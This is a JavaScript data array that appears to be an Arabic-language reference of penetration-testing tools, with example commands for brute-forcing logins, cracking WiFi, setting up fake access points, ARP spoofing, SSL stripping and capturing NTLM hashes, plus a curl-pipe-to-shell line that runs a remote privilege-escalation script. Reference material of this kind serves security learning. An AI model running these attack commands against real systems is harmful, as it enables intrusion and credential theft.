{ id:214, name:'portfwd', cat:'exploit', syntax:'portfwd add/delete', short:'إعادة توجيه المنافذ', desc:'يعيد توجيه المنافذ عبر جلسة Meterpreter لاختراق الشبكات الداخلية.', examples:['portfwd add -l 8080 -p 80 -r 192.168.1.1','portfwd list'], level:'advanced' },
{ id:215, name:'exploit-db', cat:'exploit', syntax:'searchsploit keyword', short:'قاعدة بيانات الثغرات', desc:'يبحث في Exploit Database عن ثغرات لأنظمة وخدمات محددة.', examples:['searchsploit apache 2.4','searchsploit -x 44555','searchsploit --update'], level:'intermediate' },
{ id:216, name:'beef-xss', cat:'exploit', syntax:'beef-xss', short:'استغلال XSS عبر BeEF', desc:'إطار عمل لاستغلال ثغرات XSS والتحكم بالمتصفح.', examples:['beef-xss','service beef-xss start'], level:'advanced' },

// ==========================================
// 4. WEB SECURITY - أمان الويب
// ==========================================
{ id:301, name:'nikto', cat:'web', syntax:'nikto -h target', short:'فحص ثغرات الويب', desc:'يفحص خوادم الويب بحثاً عن الثغرات والإعدادات الخاطئة والملفات الحساسة.', examples:['nikto -h http://target.com','nikto -h https://target.com -ssl','nikto -h target -p 8080','nikto -h target -o report.html -Format html'], level:'beginner' },
{ id:302, name:'dirb', cat:'web', syntax:'dirb URL wordlist', short:'اكتشاف المسارات الخفية', desc:'يفحص خوادم الويب بحثاً عن المسارات والملفات المخفية باستخدام قواميس.', examples:['dirb http://target.com','dirb http://target.com /usr/share/wordlists/dirb/big.txt','dirb https://target.com -a "Mozilla/5.0"'], level:'beginner' },
{ id:303, name:'gobuster', cat:'web', syntax:'gobuster mode -u URL -w wordlist', short:'تعداد مسارات الويب سريعاً', desc:'أسرع من dirb لاكتشاف المسارات والملفات والنطاقات الفرعية.', examples:['gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt','gobuster dns -d target.com -w subdomains.txt'], level:'beginner' },
{ id:304, name:'sqlmap', cat:'web', syntax:'sqlmap -u URL', short:'اكتشاف وأتمتة SQLi', desc:'أداة أتمتة اكتشاف واستغلال ثغرات SQL Injection.', examples:['sqlmap -u "http://target.com/page?id=1"','sqlmap -u "http://target.com/" --forms','sqlmap -u "http://target.com?id=1" --dbs','sqlmap -u "http://target.com?id=1" -D dbname --tables'], level:'intermediate' },
{ id:305, name:'wfuzz', cat:'web', syntax:'wfuzz [options] -w wordlist URL', short:'فازر طلبات الويب', desc:'يفحز طلبات الويب لاكتشاف الثغرات والمسارات والمعاملات.', examples:['wfuzz -c -z file,wordlist.txt http://target.com/FUZZ','wfuzz -c -z file,pass.txt -d "user=admin&pass=FUZZ" http://target.com/login'], level:'intermediate' },
{ id:306, name:'burpsuite', cat:'web', syntax:'burpsuite', short:'منصة اختبار تطبيقات الويب', desc:'المنصة الأشهر لاختبار أمان تطبيقات الويب. تشمل proxy, scanner, intruder, repeater.', examples:['burpsuite','java -jar burpsuite_pro.jar'], level:'intermediate' },
{ id:307, name:'zaproxy', cat:'web', syntax:'zaproxy', short:'OWASP ZAP فاحص الويب', desc:'أداة مفتوحة المصدر من OWASP لاختبار أمان تطبيقات الويب.', examples:['zaproxy','zap-cli quick-scan http://target.com'], level:'intermediate' },
{ id:308, name:'ffuf', cat:'web', syntax:'ffuf -u URL/FUZZ -w wordlist', short:'فازر ويب سريع', desc:'أداة فاز سريعة جداً لاكتشاف المسارات والمعاملات في تطبيقات الويب.', examples:['ffuf -u http://target.com/FUZZ -w wordlist.txt','ffuf -u http://target.com/FUZZ -w wordlist.txt -e .php,.html,.js','ffuf -u http://target.com/?FUZZ=test -w params.txt'], level:'intermediate' },
{ id:309, name:'whatweb', cat:'web', syntax:'whatweb [options] URL', short:'اكتشاف تقنيات الموقع', desc:'يحدد تقنيات وأطر العمل والمكونات المستخدمة في الموقع.', examples:['whatweb http://target.com','whatweb -a 3 http://target.com','whatweb -v http://target.com'], level:'beginner' },
{ id:310, name:'wafw00f', cat:'web', syntax:'wafw00f URL', short:'كشف جدران حماية الويب WAF', desc:'يكشف ويحدد نوع جدار حماية تطبيقات الويب (WAF) المستخدم.', examples:['wafw00f http://target.com','wafw00f -v https://target.com','wafw00f -a https://target.com'], level:'intermediate' },
{ id:311, name:'wpscan', cat:'web', syntax:'wpscan --url URL', short:'فحص مواقع WordPress', desc:'يفحص مواقع WordPress بحثاً عن الثغرات والإضافات الضعيفة والمستخدمين.', examples:['wpscan --url http://target.com','wpscan --url http://target.com -e u,p','wpscan --url http://target.com --passwords /usr/share/wordlists/rockyou.txt'], level:'intermediate' },
{ id:312, name:'joomscan', cat:'web', syntax:'joomscan --url URL', short:'فحص مواقع Joomla', desc:'يفحص مواقع Joomla بحثاً عن الثغرات والإعدادات الخاطئة.', examples:['joomscan --url http://target.com','joomscan -u http://target.com -ec'], level:'intermediate' },
{ id:313, name:'droopescan', cat:'web', syntax:'droopescan scan drupal -u URL', short:'فحص مواقع Drupal', desc:'يفحص مواقع Drupal وأنظمة إدارة المحتوى الأخرى.', examples:['droopescan scan drupal -u http://target.com','droopescan scan silverstripe -u http://target.com'], level:'intermediate' },
{ id:314, name:'commix', cat:'web', syntax:'commix --url URL', short:'اكتشاف واستغلال Command Injection', desc:'يكتشف ويستغل ثغرات Command Injection تلقائياً في تطبيقات الويب.', examples:['commix --url "http://target.com/vuln.php?param=INJECT_HERE"','commix --url http://target.com --all-techniques'], level:'advanced' },
{ id:315, name:'xsser', cat:'web', syntax:'xsser -u URL', short:'اكتشاف ثغرات XSS', desc:'أداة آلية لاكتشاف واستغلال ثغرات Cross-Site Scripting.', examples:['xsser -u "http://target.com/search?q=FUZZ"','xsser --auto -u http://target.com'], level:'intermediate' },
{ id:316, name:'davtest', cat:'web', syntax:'davtest -url URL', short:'اختبار WebDAV', desc:'يختبر خوادم WebDAV لرفع الملفات وتنفيذ الكود.', examples:['davtest -url http://target.com/webdav','davtest -auth user:pass -url http://target.com/webdav'], level:'intermediate' },
{ id:317, name:'arjun', cat:'web', syntax:'arjun -u URL', short:'اكتشاف معاملات HTTP', desc:'يكتشف المعاملات المخفية في طلبات HTTP.', examples:['arjun -u http://target.com/endpoint','arjun -u http://target.com -m POST','arjun -i urls.txt'], level:'intermediate' },
{ id:318, name:'dirsearch', cat:'web', syntax:'dirsearch -u URL', short:'بحث شامل في مسارات الويب', desc:'يبحث بشكل شامل عن المسارات والملفات المخفية في تطبيقات الويب.', examples:['dirsearch -u http://target.com','dirsearch -u http://target.com -e php,html,txt'], level:'beginner' },

// ==========================================
// 5. PASSWORD ATTACKS - هجمات كلمات المرور
// ==========================================
{ id:401, name:'hydra', cat:'password', syntax:'hydra [options] target', short:'كسر كلمات المرور عبر الشبكة', desc:'أداة قوية لكسر كلمات مرور خدمات متعددة عبر الشبكة (SSH, FTP, HTTP, SMB...).', examples:['hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1','hydra -L users.txt -P pass.txt ftp://target','hydra -l admin -P pass.txt http-post-form "/login.php:user=^USER^&pass=^PASS^:Invalid"'], level:'intermediate' },
{ id:402, name:'john', cat:'password', syntax:'john [options] hashfile', short:'كسر كلمات المرور المشفرة', desc:'أداة John the Ripper الشهيرة لكسر كلمات المرور المشفرة.', examples:['john hashes.txt','john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt','john --rules hashes.txt','john --format=md5 hashes.txt'], level:'intermediate' },
{ id:403, name:'hashcat', cat:'password', syntax:'hashcat [options] hashfile wordlist', short:'كسر الهاشات بالـ GPU', desc:'أسرع أداة لكسر كلمات المرور باستخدام قوة GPU.', examples:['hashcat -a 0 -m 0 hashes.txt rockyou.txt','hashcat -a 3 -m 1000 hash.txt ?a?a?a?a?a?a','hashcat -a 6 -m 0 hash.txt wordlist.txt ?d?d?d'], level:'intermediate' },
{ id:404, name:'medusa', cat:'password', syntax:'medusa [options]', short:'كسر كلمات مرور الشبكة', desc:'أداة موازية سريعة لكسر كلمات مرور خدمات متعددة.', examples:['medusa -h 192.168.1.1 -u admin -P pass.txt -M ssh','medusa -H hosts.txt -U users.txt -P pass.txt -M ftp'], level:'intermediate' },
{ id:405, name:'crunch', cat:'password', syntax:'crunch min max charset', short:'إنشاء قواميس مخصصة', desc:'ينشئ قواميس كلمات مرور مخصصة بناءً على المعايير المحددة.', examples:['crunch 6 8 abcdefghij123 -o wordlist.txt','crunch 4 6 -t @@%%','crunch 8 8 -t password@@'], level:'intermediate' },
{ id:406, name:'cewl', cat:'password', syntax:'cewl [options] URL', short:'إنشاء قواميس من مواقع الويب', desc:'يستخرج الكلمات من موقع ويب لإنشاء قاموس كلمات مرور مخصص.', examples:['cewl http://target.com -w wordlist.txt','cewl -m 8 -d 3 http://target.com'], level:'intermediate' },
{ id:407, name:'hashid', cat:'password', syntax:'hashid hash', short:'تحديد نوع الهاش', desc:'يحدد نوع التشفير المستخدم لقيمة هاش معينة.', examples:['hashid 5f4dcc3b5aa765d61d8327deb882cf99','hashid -m hash.txt'], level:'beginner' },
{ id:408, name:'hash-identifier', cat:'password', syntax:'hash-identifier', short:'تعريف أنواع التشفير', desc:'يساعد في تحديد نوع الهاش ليتم اختيار الأداة المناسبة لكسره.', examples:['hash-identifier','echo "md5hash" | hash-identifier'], level:'beginner' },
{ id:409, name:'ophcrack', cat:'password', syntax:'ophcrack', short:'كسر كلمات مرور Windows', desc:'يكسر كلمات مرور Windows باستخدام Rainbow Tables.', examples:['ophcrack','ophcrack -t /tables -f /hashes'], level:'intermediate' },
{ id:410, name:'fcrackzip', cat:'password', syntax:'fcrackzip [options] zipfile', short:'كسر كلمات مرور ZIP', desc:'يكسر كلمات مرور ملفات ZIP المشفرة.', examples:['fcrackzip -u -D -p rockyou.txt archive.zip','fcrackzip -b -c a -l 4-6 archive.zip'], level:'intermediate' },
{ id:411, name:'pdfcrack', cat:'password', syntax:'pdfcrack [options] file.pdf', short:'كسر حماية PDF', desc:'يكسر كلمات مرور ملفات PDF.', examples:['pdfcrack -f file.pdf -w wordlist.txt','pdfcrack -f file.pdf -n 4 -m 8'], level:'intermediate' },
{ id:412, name:'brutespray', cat:'password', syntax:'brutespray [options]', short:'هجوم مرور شامل على خدمات الشبكة', desc:'يستخدم نتائج Nmap لتطبيق هجمات كلمات المرور على الخدمات المكتشفة.', examples:['brutespray --file nmap.gnmap -U users.txt -P pass.txt'], level:'advanced' },
{ id:413, name:'patator', cat:'password', syntax:'patator module arguments', short:'إطار اختبار بروتوكولات متعدد', desc:'إطار عمل مرن لاختبار المصادقة عبر بروتوكولات متعددة.', examples:['patator ssh_login host=192.168.1.1 user=root password=FILE0 0=pass.txt','patator http_fuzz url=http://target/login method=POST body="user=FILE0&pass=FILE1" 0=users.txt 1=pass.txt'], level:'advanced' },

// ==========================================
// 6. WIRELESS - الشبكات اللاسلكية
// ==========================================
{ id:501, name:'airmon-ng', cat:'wireless', syntax:'airmon-ng command interface', short:'تفعيل وضع المراقبة', desc:'يضع واجهة الشبكة اللاسلكية في وضع المراقبة لالتقاط الحزم.', examples:['airmon-ng start wlan0','airmon-ng stop wlan0mon','airmon-ng check kill'], level:'intermediate' },
{ id:502, name:'airodump-ng', cat:'wireless', syntax:'airodump-ng [options] interface', short:'التقاط وتحليل الشبكات اللاسلكية', desc:'يلتقط حزم الشبكات اللاسلكية ويعرض معلومات نقاط الوصول والأجهزة.', examples:['airodump-ng wlan0mon','airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture wlan0mon'], level:'intermediate' },
{ id:503, name:'aireplay-ng', cat:'wireless', syntax:'aireplay-ng [options] interface', short:'حقن حزم لاسلكية', desc:'يحقن حزم لاسلكية لتسريع الاختراق أو إجبار المصافحة.', examples:['aireplay-ng --deauth 10 -a BSSID wlan0mon','aireplay-ng -1 0 -a BSSID wlan0mon'], level:'advanced' },
{ id:504, name:'aircrack-ng', cat:'wireless', syntax:'aircrack-ng [options] capture', short:'كسر كلمات مرور WiFi', desc:'يكسر مفاتيح WEP و WPA/WPA2 من ملفات الالتقاط.', examples:['aircrack-ng -b BSSID capture-01.cap','aircrack-ng -w rockyou.txt capture-01.cap'], level:'intermediate' },
{ id:505, name:'wifite', cat:'wireless', syntax:'wifite [options]', short:'اختبار الشبكات اللاسلكية الآلي', desc:'أداة آلية تجمع airmon-ng وairodump-ng وaircrack-ng في سير عمل واحد.', examples:['wifite','wifite --wpa --dict rockyou.txt'], level:'beginner' },
{ id:506, name:'reaver', cat:'wireless', syntax:'reaver -i interface -b BSSID', short:'اختراق WPS', desc:'يستغل ثغرة WPS PIN لاكتشاف كلمة مرور WPA/WPA2.', examples:['reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv','reaver -i wlan0mon -b BSSID -K 1'], level:'advanced' },
{ id:507, name:'pixiewps', cat:'wireless', syntax:'pixiewps [options]', short:'هجوم Pixie Dust على WPS', desc:'يكسر WPS PIN بهجوم Pixie Dust السريع.', examples:['pixiewps -e PKE -r PKR -s E-Hash1 -z E-Hash2 -a AUTHKEY -n E-Nonce'], level:'advanced' },
{ id:508, name:'bettercap', cat:'wireless', syntax:'bettercap [options]', short:'إطار هجمات MITM', desc:'إطار شامل لهجمات Man-in-the-Middle على الشبكات السلكية واللاسلكية.', examples:['bettercap -iface eth0','bettercap -eval "net.probe on; net.sniff on"'], level:'advanced' },
{ id:509, name:'ettercap', cat:'wireless', syntax:'ettercap [options]', short:'هجمات التنصت والتحليل', desc:'أداة شاملة لهجمات Man-in-the-Middle والتنصت على الشبكة.', examples:['ettercap -G','ettercap -Tq -i eth0 -M arp:remote /gateway/ /victim/'], level:'advanced' },
{ id:510, name:'kismet', cat:'wireless', syntax:'kismet', short:'كاشف الشبكات اللاسلكية', desc:'يكشف الشبكات اللاسلكية ومجمع حزم منخفض المستوى.', examples:['kismet','kismet --no-ncurses'], level:'intermediate' },
{ id:511, name:'wifi-honey', cat:'wireless', syntax:'wifi-honey SSID channel interface', short:'نقطة وصول مزيفة', desc:'ينشئ نقطة وصول وهمية لاصطياد الأجهزة وجمع كلمات المرور.', examples:['wifi-honey FreeWifi 6 wlan0'], level:'advanced' },
{ id:512, name:'hostapd-wpe', cat:'wireless', syntax:'hostapd-wpe hostapd.conf', short:'هجوم Enterprise WiFi', desc:'ينشئ نقطة وصول مزيفة Enterprise لاصطياد بيانات PEAP/MSCHAPv2.', examples:['hostapd-wpe hostapd-wpe.conf'], level:'advanced' },

// ==========================================
// 7. FORENSICS - التحقيق الجنائي الرقمي
// ==========================================
{ id:601, name:'autopsy', cat:'forensics', syntax:'autopsy', short:'منصة تحقيق جنائي رقمي', desc:'منصة تحليل جنائي رقمي مفتوحة المصدر لتحليل الأقراص الصلبة والأجهزة.', examples:['autopsy','autopsy -d /case/ -c'], level:'intermediate' },
{ id:602, name:'volatility', cat:'forensics', syntax:'volatility -f memory.dump --profile=Profile plugin', short:'تحليل تفريغ الذاكرة', desc:'أداة تحليل ذاكرة RAM مفتوحة المصدر وقوية للغاية.', examples:['volatility -f memory.dump imageinfo','volatility -f memory.dump --profile=WinXPSP3x86 pslist','volatility -f memory.dump --profile=Win7SP1x64 netscan'], level:'advanced' },
{ id:603, name:'binwalk', cat:'forensics', syntax:'binwalk [options] file', short:'تحليل الملفات الثنائية', desc:'يفحص الملفات الثنائية لاستخراج الملفات المضمنة وتحليل البنية.', examples:['binwalk firmware.bin','binwalk -e firmware.bin','binwalk -Me firmware.bin'], level:'intermediate' },
{ id:604, name:'foremost', cat:'forensics', syntax:'foremost [options] -i image', short:'استعادة الملفات المحذوفة', desc:'يستعيد الملفات المحذوفة من صور الأقراص بناءً على أنماط الترويسات.', examples:['foremost -i disk.img -o output/','foremost -t jpg,png,doc -i disk.img'], level:'intermediate' },
{ id:605, name:'scalpel', cat:'forensics', syntax:'scalpel [options] image', short:'حفر البيانات من الأقراص', desc:'يستخرج الملفات من صور الأقراص بناءً على بصمات الملفات.', examples:['scalpel -o output/ disk.img','scalpel -c /etc/scalpel.conf disk.img'], level:'intermediate' },
{ id:606, name:'dd', cat:'forensics', syntax:'dd if=source of=destination', short:'نسخ الأقراص والبيانات', desc:'أداة أساسية للتحليل الجنائي لنسخ الأقراص بالكامل بما فيها البيانات المحذوفة.', examples:['dd if=/dev/sda of=disk.img bs=4096','dd if=/dev/sda | gzip > disk.img.gz','dd if=disk.img of=/dev/sdb status=progress'], level:'intermediate' },
{ id:607, name:'strings', cat:'forensics', syntax:'strings [options] file', short:'استخراج النصوص من الملفات', desc:'يستخرج السلاسل النصية القابلة للقراءة من الملفات الثنائية.', examples:['strings malware.exe','strings -n 8 binary.bin','strings -a file | grep -i password'], level:'beginner' },
{ id:608, name:'hexdump', cat:'forensics', syntax:'hexdump [options] file', short:'عرض الملف بصيغة سداسية', desc:'يعرض محتوى الملف بصيغة سداسية عشرية.', examples:['hexdump -C file.bin','hexdump -n 256 file.bin','xxd file.bin'], level:'intermediate' },
{ id:609, name:'exiftool', cat:'forensics', syntax:'exiftool [options] file', short:'تحليل بيانات EXIF', desc:'يقرأ ويكتب ويعدل بيانات الميتاداتا في الملفات المختلفة.', examples:['exiftool image.jpg','exiftool -all= image.jpg','exiftool -GPS* photo.jpg'], level:'beginner' },
{ id:610, name:'steghide', cat:'forensics', syntax:'steghide embed/extract -sf file', short:'إخفاء البيانات واستخراجها', desc:'يخفي ويستخرج البيانات في ملفات الصور والصوت (Steganography).', examples:['steghide embed -cf cover.jpg -sf secret.txt','steghide extract -sf image.jpg','steghide info image.jpg'], level:'intermediate' },
{ id:611, name:'stegsolve', cat:'forensics', syntax:'stegsolve', short:'تحليل الإخفاء في الصور', desc:'أداة Java للكشف عن البيانات المخفية في الصور باستخدام تقنيات مختلفة.', examples:['java -jar stegsolve.jar'], level:'intermediate' },
{ id:612, name:'photorec', cat:'forensics', syntax:'photorec', short:'استعادة الملفات المحذوفة', desc:'يستعيد الملفات المحذوفة من الأقراص وبطاقات الذاكرة.', examples:['photorec','photorec /d /output /dev/sdb'], level:'beginner' },
{ id:613, name:'testdisk', cat:'forensics', syntax:'testdisk', short:'استعادة جداول الأقسام', desc:'يفحص ويستعيد جداول الأقسام والأقراص التالفة.', examples:['testdisk','testdisk /dev/sda'], level:'intermediate' },

// ==========================================
// 8. RECON - الاستطلاع
// ==========================================
{ id:701, name:'theHarvester', cat:'recon', syntax:'theHarvester -d domain -b source', short:'جمع المعلومات من الإنترنت', desc:'يجمع عناوين البريد الإلكتروني وأسماء المضيف وعناوين IP من مصادر متعددة.', examples:['theHarvester -d target.com -b google','theHarvester -d target.com -b all -l 500','theHarvester -d target.com -b linkedin'], level:'beginner' },
{ id:702, name:'maltego', cat:'recon', syntax:'maltego', short:'تحليل العلاقات والشبكات المفاهيمية', desc:'أداة بصرية لجمع وربط المعلومات من مصادر متعددة وتحليل العلاقات.', examples:['maltego'], level:'intermediate' },
{ id:703, name:'recon-ng', cat:'recon', syntax:'recon-ng', short:'إطار عمل الاستطلاع', desc:'إطار عمل استطلاع شامل بواجهة مشابهة لـ Metasploit.', examples:['recon-ng','marketplace search','modules load recon/domains-hosts/hackertarget'], level:'intermediate' },
{ id:704, name:'shodan', cat:'recon', syntax:'shodan command', short:'محرك بحث الأجهزة المتصلة', desc:'يستخدم Shodan API للبحث عن الأجهزة المعرضة على الإنترنت.', examples:['shodan search "apache"','shodan host 8.8.8.8','shodan count "port:22 country:SA'], level:'intermediate' },
{ id:705, name:'whois', cat:'recon', syntax:'whois domain/IP', short:'معلومات تسجيل النطاق', desc:'يجمع معلومات تسجيل النطاقات وعناوين IP.', examples:['whois target.com','whois 8.8.8.8','whois -h whois.arin.net 192.168.1.1'], level:'beginner' },
{ id:706, name:'dig', cat:'recon', syntax:'dig [options] domain', short:'استعلامات DNS تفصيلية', desc:'أداة استعلام DNS قوية لاستخراج سجلات DNS المختلفة.', examples:['dig target.com','dig target.com MX','dig target.com ANY','dig axfr @nameserver target.com'], level:'beginner' },
{ id:707, name:'dnsrecon', cat:'recon', syntax:'dnsrecon -d domain', short:'استطلاع DNS شامل', desc:'يجمع معلومات DNS شاملة بما في ذلك نقل المنطقة وتعداد النطاقات الفرعية.', examples:['dnsrecon -d target.com','dnsrecon -d target.com -t axfr','dnsrecon -d target.com -t brute'], level:'intermediate' },
{ id:708, name:'dnsenum', cat:'recon', syntax:'dnsenum domain', short:'تعداد DNS', desc:'يعدد معلومات DNS بما في ذلك نقل المنطقة وتخمين النطاقات الفرعية.', examples:['dnsenum target.com','dnsenum --dnsserver 8.8.8.8 target.com'], level:'intermediate' },
{ id:709, name:'fierce', cat:'recon', syntax:'fierce --domain domain', short:'استطلاع DNS وتعداد نطاقات فرعية', desc:'يعدد النطاقات الفرعية ويكشف عن شبكة الهدف.', examples:['fierce --domain target.com','fierce --domain target.com --subdomains-file subs.txt'], level:'intermediate' },
{ id:710, name:'amass', cat:'recon', syntax:'amass enum -d domain', short:'تعداد الأصول على الإنترنت', desc:'أداة شاملة لاستطلاع DNS وتعداد الأصول على الإنترنت.', examples:['amass enum -d target.com','amass enum -passive -d target.com','amass intel -d target.com'], level:'intermediate' },
{ id:711, name:'subfinder', cat:'recon', syntax:'subfinder -d domain', short:'اكتشاف النطاقات الفرعية', desc:'يكتشف النطاقات الفرعية بسرعة من مصادر متعددة.', examples:['subfinder -d target.com','subfinder -d target.com -o subs.txt'], level:'beginner' },
{ id:712, name:'osintframework', cat:'recon', syntax:'osintframework', short:'إطار عمل OSINT', desc:'مجموعة شاملة من أدوات OSINT لجمع المعلومات المفتوحة المصدر.', examples:['osintframework'], level:'beginner' },
{ id:713, name:'sherlock', cat:'recon', syntax:'sherlock username', short:'البحث عن حسابات شبكات التواصل', desc:'يبحث عن اسم مستخدم عبر عشرات منصات التواصل الاجتماعي.', examples:['sherlock username','sherlock --timeout 5 username'], level:'beginner' },
{ id:714, name:'spiderfoot', cat:'recon', syntax:'spiderfoot -l localhost:5001', short:'أتمتة الاستطلاع', desc:'أداة أتمتة OSINT تجمع المعلومات من 200+ مصدر.', examples:['spiderfoot -l localhost:5001','python3 sf.py -s target.com -t INTERNET_NAME'], level:'intermediate' },
{ id:715, name:'metagoofil', cat:'recon', syntax:'metagoofil -d domain -t file_type', short:'استخراج بيانات من الملفات العامة', desc:'يستخرج بيانات الميتاداتا من الملفات العامة (PDF, Word, Excel...).', examples:['metagoofil -d target.com -t pdf -n 10 -o output/','metagoofil -d target.com -t doc,pdf,xls'], level:'intermediate' },
{ id:716, name:'photon', cat:'recon', syntax:'python3 photon.py -u URL', short:'استخراج معلومات المواقع', desc:'يستخرج URLs وعناوين البريد والروابط وملفات أخرى من المواقع.', examples:['python3 photon.py -u http://target.com','python3 photon.py -u http://target.com --keys'], level:'intermediate' },

// ==========================================
// 9. CRYPTO - التشفير
// ==========================================
{ id:801, name:'openssl', cat:'crypto', syntax:'openssl command [options]', short:'أدوات التشفير الشاملة', desc:'مجموعة أدوات التشفير وSSL/TLS الأكثر استخداماً.', examples:['openssl genrsa -out key.pem 2048','openssl req -new -key key.pem -out cert.csr','openssl x509 -in cert.pem -text','openssl enc -aes-256-cbc -in file -out encrypted'], level:'intermediate' },
{ id:802, name:'gpg', cat:'crypto', syntax:'gpg [options]', short:'تشفير وتوقيع الملفات', desc:'تشفير وتوقيع وإدارة مفاتيح PGP.', examples:['gpg --gen-key','gpg --encrypt --recipient user@email.com file','gpg --decrypt file.gpg','gpg --sign file.txt'], level:'intermediate' },
{ id:803, name:'md5sum', cat:'crypto', syntax:'md5sum [options] file', short:'حساب MD5', desc:'يحسب قيمة MD5 للتحقق من سلامة الملفات.', examples:['md5sum file.iso','md5sum -c checksums.md5','echo "text" | md5sum'], level:'beginner' },
{ id:804, name:'sha256sum', cat:'crypto', syntax:'sha256sum file', short:'حساب SHA256', desc:'يحسب قيمة SHA256 للتحقق من سلامة الملفات.', examples:['sha256sum file.iso','sha256sum -c hashes.txt'], level:'beginner' },
{ id:805, name:'base64', cat:'crypto', syntax:'base64 [options] file', short:'ترميز/فك ترميز Base64', desc:'يشفر ويفك تشفير البيانات بصيغة Base64.', examples:['base64 file.txt','echo "text" | base64','echo "dGV4dA==" | base64 -d'], level:'beginner' },
{ id:806, name:'xortool', cat:'crypto', syntax:'xortool [options] file', short:'تحليل تشفير XOR', desc:'يحلل ويكسر التشفير البسيط بخوارزمية XOR.', examples:['xortool -c 0x20 encoded.bin','xortool -l 16 encoded.bin'], level:'intermediate' },
{ id:807, name:'rsatool', cat:'crypto', syntax:'rsatool [options]', short:'حساب مفاتيح RSA', desc:'يحسب مكونات مفاتيح RSA الخاصة من معاملات معروفة.', examples:['rsatool -f PEM -o private.pem -p P -q Q','rsatool -n N -e E -f PEM'], level:'advanced' },
{ id:808, name:'hashcat --identify', cat:'crypto', syntax:'hashcat --identify hash', short:'تحديد نوع الهاش', desc:'يحدد نوع تشفير الهاش وخوارزميته.', examples:['hashcat --identify 5f4dcc3b5aa765d61d8327deb882cf99'], level:'beginner' },
{ id:809, name:'certutil', cat:'crypto', syntax:'certutil [options]', short:'إدارة الشهادات', desc:'أداة إدارة الشهادات وعمليات التشفير.', examples:['certutil -hash -algorithm MD5 file','certutil -encode file.txt encoded.b64'], level:'intermediate' },

// ==========================================
// 10. SNIFFING - التنصت والتحليل
// ==========================================
{ id:901, name:'wireshark', cat:'network', syntax:'wireshark [options]', short:'محلل بروتوكولات الشبكة', desc:'أداة التقاط وتحليل حزم الشبكة الأشهر مع واجهة رسومية.', examples:['wireshark','wireshark -r capture.pcap','wireshark -k -i eth0'], level:'beginner' },
{ id:902, name:'tcpdump', cat:'network', syntax:'tcpdump [options]', short:'التقاط حزم الشبكة', desc:'يلتقط ويحلل حزم الشبكة من سطر الأوامر.', examples:['tcpdump -i eth0','tcpdump -i eth0 port 80','tcpdump -w capture.pcap -i eth0','tcpdump -r capture.pcap'], level:'intermediate' },
{ id:903, name:'tshark', cat:'network', syntax:'tshark [options]', short:'Wireshark من سطر الأوامر', desc:'واجهة سطر أوامر لـ Wireshark لالتقاط وتحليل الحزم.', examples:['tshark -i eth0','tshark -r capture.pcap','tshark -T fields -e http.host -r capture.pcap'], level:'intermediate' },
{ id:904, name:'dsniff', cat:'network', syntax:'dsniff [options]', short:'التقاط كلمات المرور من الشبكة', desc:'مجموعة أدوات لالتقاط كلمات المرور عبر الشبكة.', examples:['dsniff -i eth0','urlsnarf -i eth0','mailsnarf -i eth0'], level:'advanced' },
{ id:905, name:'arpspoof', cat:'network', syntax:'arpspoof -i interface -t target gateway', short:'تزوير ARP', desc:'ينفذ هجوم ARP Poisoning لاعتراض حركة مرور الشبكة.', examples:['arpspoof -i eth0 -t 192.168.1.100 192.168.1.1','arpspoof -i eth0 -t 192.168.1.1 192.168.1.100'], level:'advanced' },
{ id:906, name:'sslstrip', cat:'network', syntax:'sslstrip [options]', short:'خفض SSL/TLS للنص الواضح', desc:'يخفض اتصالات HTTPS إلى HTTP لالتقاط البيانات المشفرة.', examples:['sslstrip -l 10000','sslstrip -p -l 10000 -w output.log'], level:'advanced' },
{ id:907, name:'mitmproxy', cat:'network', syntax:'mitmproxy [options]', short:'وكيل MITM تفاعلي', desc:'وكيل MITM تفاعلي لالتقاط وتعديل حركة HTTP/HTTPS.', examples:['mitmproxy','mitmproxy -s script.py','mitmdump -w capture.bin'], level:'intermediate' },
{ id:908, name:'responder', cat:'network', syntax:'responder -I interface', short:'التقاط بيانات NTLM', desc:'يعترض بيانات مصادقة NTLM/NTLMv2 على الشبكة المحلية.', examples:['responder -I eth0','responder -I eth0 -w -d'], level:'advanced' },

// ==========================================
// 11. PRIVILEGE ESCALATION - رفع الصلاحيات
// ==========================================
{ id:1001, name:'linpeas', cat:'system', syntax:'./linpeas.sh', short:'فحص رفع صلاحيات Linux', desc:'سكريبت شامل يفحص Linux بحثاً عن مسارات رفع الصلاحيات.', examples:['./linpeas.sh','./linpeas.sh -a','curl https://linpeas.sh | sh'], level:'intermediate' },
{ id:1002, name:'winpeas', cat:'system', syntax:'winpeas.exe', short:'فحص رفع صلاحيات Windows', desc:'يفحص Windows بحثاً عن مسارات رفع الصلاحيات.', examples:['winpeas.exe','winpeas.exe all > output.txt'], level:'intermediate' },
{ id:1003, name:'sudo -l', cat:'system', syntax:'sudo -l', short:'قائمة صلاحيات sudo', desc:'يعرض الأوامر التي يمكن تنفيذها بصلاحيات root عبر sudo.', examples:['sudo -l','sudo -l -U username'], level:'beginner' },
{ id:1004, name:'find SUID', cat:'system', syntax:'find / -perm -4000', short:'البحث عن ملفات SUID', desc:'يبحث عن الملفات ذات bit SUID التي يمكن استغلالها لرفع الصلاحيات.', examples:['find / -perm -4000 -type f 2>/dev/null','find / -perm -u=s -type f 2>/dev/null'], level:'intermediate' },
{ id:1005, name:'crontab abuse', cat:'system', syntax:'cat /etc/crontab', short:'استغلال مهام cron', desc:'يفحص مهام cron المجدولة للبحث عن مسارات الاستغلال.', examples:['cat /etc/crontab','ls -la /etc/cron*','cat /var/spool/cron/crontabs/*'], level:'intermediate' },
{ id:1006, name:'env PATH exploit', cat:'system', syntax:'export PATH=/tmp:$PATH', short:'استغلال متغير PATH', desc:'يستغل متغير PATH لتنفيذ برامج ضارة بدلاً من البرامج الشرعية.', examples:['export PATH=/tmp:$PATH','which python'], level:'advanced' },
{ id:1007, name:'kernel exploit', cat:'system', syntax:'uname -a', short:'استغلال ثغرات النواة', desc:'يحدد إصدار النواة للبحث عن ثغرات رفع الصلاحيات المعروفة.', examples:['uname -a','uname -r','cat /proc/version','searchsploit linux kernel 5.4'], level:'advanced' },
